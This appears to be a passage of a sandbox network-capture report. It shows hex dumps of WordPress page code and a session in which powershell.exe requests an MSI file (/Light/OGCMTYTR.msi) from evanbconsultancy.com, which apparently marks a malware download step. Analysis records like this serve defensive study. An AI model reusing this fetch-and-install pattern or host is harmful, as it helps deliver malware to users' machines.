                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 76 61 6e 62 63 6f 6e 73 75 6c 74 61 6e 63 79 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73
                                                                                                                                                                                                        Data Ascii: ._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/evanbconsultancy.com\/wp-includes\/js
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                        Data Ascii: ="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21
                                                                                                                                                                                                        Data Ascii: .everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 3b 7d 70 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 2c 68 32 2c 2e 65
                                                                                                                                                                                                        Data Ascii: ody,button,input,select,textarea,.ast-button,.ast-custom-button{font-family:'Montserrat',sans-serif;font-weight:400;font-size:16px;font-size:1rem;}blockquote{color:var(--ast-global-color-3);}p,.entry-content p{margin-bottom:1em;}h1,.entry-content h1,h2,.e
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 7a 65 3a 31 2e 31 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 75 6c 69 73 68 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 68 36 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 75 6c 69 73 68 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 62 6f 64 79 2c 68 31 2c 2e 65 6e 74 72 79 2d 74
                                                                                                                                                                                                        Data Ascii: ze:1.125rem;line-height:1.2em;font-family:'Mulish',sans-serif;}h6,.entry-content h6{font-size:12px;font-size:0.75rem;line-height:1.25em;font-family:'Mulish',sans-serif;}::selection{background-color:var(--ast-global-color-0);color:#ffffff;}body,h1,.entry-t
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 70 61 67 65 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 70 6f 73 74 2d 6e 61 76 69
                                                                                                                                                                                                        Data Ascii: :1.45;color:var(--ast-global-color-0);}.entry-meta a:not(.ast-button):hover,.entry-meta a:not(.ast-button):hover *,.entry-meta a:not(.ast-button):focus,.entry-meta a:not(.ast-button):focus *,.page-links > .page-link,.page-links .page-link:hover,.post-navi
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 72 2d 33 29 3b 7d 2e 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 2e 73 6c 69 64 65 2d 73 65 61 72 63 68 20 61 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 73 74 72 61 2d 73 65 61 72 63 68 2d 69 63 6f 6e 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 23 63 6c 6f 73 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 61 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 73 74 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 73 69 74 65 20 2e 73 6b 69 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61
                                                                                                                                                                                                        Data Ascii: r-3);}.ast-search-menu-icon.slide-search a:focus-visible:focus-visible,.astra-search-icon:focus-visible,#close:focus-visible,a:focus-visible,.ast-menu-toggle:focus-visible,.site .skip-link:focus-visible,.wp-block-loginout input:focus-visible,.wp-block-sea
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20 2e 61 73 74 2d 62
                                                                                                                                                                                                        Data Ascii: put[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"] .ast-b
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC1369INData Raw: 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 3a 66 6f 63 75 73 2c 23 61 73 74 2d 63 6f 75 70 6f 6e 2d 63 6f 64 65 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f
                                                                                                                                                                                                        Data Ascii: ocommerce form .form-row .select2-container--default .select2-selection--single:focus,#ast-coupon-code:focus,.woocommerce.woocommerce-js .quantity input[type=number]:focus,.woocommerce-js .woocommerce-mini-cart-item .quantity input[type=number]:focus,.woo


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.74972384.32.84.1214437496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-21 14:02:24 UTC64OUTGET /Light/OGCMTYTR.msi HTTP/1.1
                                                                                                                                                                                                        Host: evanbconsultancy.com
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC560INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Sat, 21 Dec 2024 14:02:25 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        x-powered-by: PHP/8.2.20
                                                                                                                                                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                        link: <https://evanbconsultancy.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                        platform: hostinger
                                                                                                                                                                                                        panel: hpanel
                                                                                                                                                                                                        content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                        Server: hcdn
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        x-hcdn-request-id: 6c200b0b40ccb4c75f5dab7828e9bb32-bos-edge2
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC809INData Raw: 35 32 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 65 76 61 6e 62 63 6f 6e 73 75 6c 74 61 6e 63 79 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c
                                                                                                                                                                                                        Data Ascii: 521<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; evanbconsultancy.com</title><
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 76 61 6e 62 63 6f 6e 73 75 6c 74 61 6e 63 79 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36
                                                                                                                                                                                                        Data Ascii: "https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/evanbconsultancy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29
                                                                                                                                                                                                        Data Ascii: alScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e)
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29
                                                                                                                                                                                                        Data Ascii: g"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e})
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 3b 7d 70 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 2c 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 2c 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65
                                                                                                                                                                                                        Data Ascii: a,.ast-button,.ast-custom-button{font-family:'Montserrat',sans-serif;font-weight:400;font-size:16px;font-size:1rem;}blockquote{color:var(--ast-global-color-3);}p,.entry-content p{margin-bottom:1em;}h1,.entry-content h1,h2,.entry-content h2,h3,.entry-conte
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 75 6c 69 73 68 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 68 36 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 75 6c 69 73 68 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 62 6f 64 79 2c 68 31 2c 2e 65 6e 74 72 79 2d 74 69 74 6c 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 2c 68 32 2c 2e 65 6e
                                                                                                                                                                                                        Data Ascii: ont-family:'Mulish',sans-serif;}h6,.entry-content h6{font-size:12px;font-size:0.75rem;line-height:1.25em;font-family:'Mulish',sans-serif;}::selection{background-color:var(--ast-global-color-0);color:#ffffff;}body,h1,.entry-title a,.entry-content h1,h2,.en
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 6c 6f 72 2d 30 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 70 61 67 65 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 70 6f 73 74 2d 6e 61 76 69 67 61 74 69 6f 6e 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d
                                                                                                                                                                                                        Data Ascii: lor-0);}.entry-meta a:not(.ast-button):hover,.entry-meta a:not(.ast-button):hover *,.entry-meta a:not(.ast-button):focus,.entry-meta a:not(.ast-button):focus *,.page-links > .page-link,.page-links .page-link:hover,.post-navigation a:hover{color:var(--ast-
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 64 65 2d 73 65 61 72 63 68 20 61 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 73 74 72 61 2d 73 65 61 72 63 68 2d 69 63 6f 6e 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 23 63 6c 6f 73 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 61 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 73 74 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 73 69 74 65 20 2e 73 6b 69 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73
                                                                                                                                                                                                        Data Ascii: de-search a:focus-visible:focus-visible,.astra-search-icon:focus-visible,#close:focus-visible,a:focus-visible,.ast-menu-toggle:focus-visible,.site .skip-link:focus-visible,.wp-block-loginout input:focus-visible,.wp-block-search.wp-block-search__button-ins
                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20 2e 61 73 74 2d 62 75 74 74 6f 6e 2d 77 72 61 70 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 74 72 69
                                                                                                                                                                                                        Data Ascii: ype="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"] .ast-button-wrap .ast-mobile-menu-tri
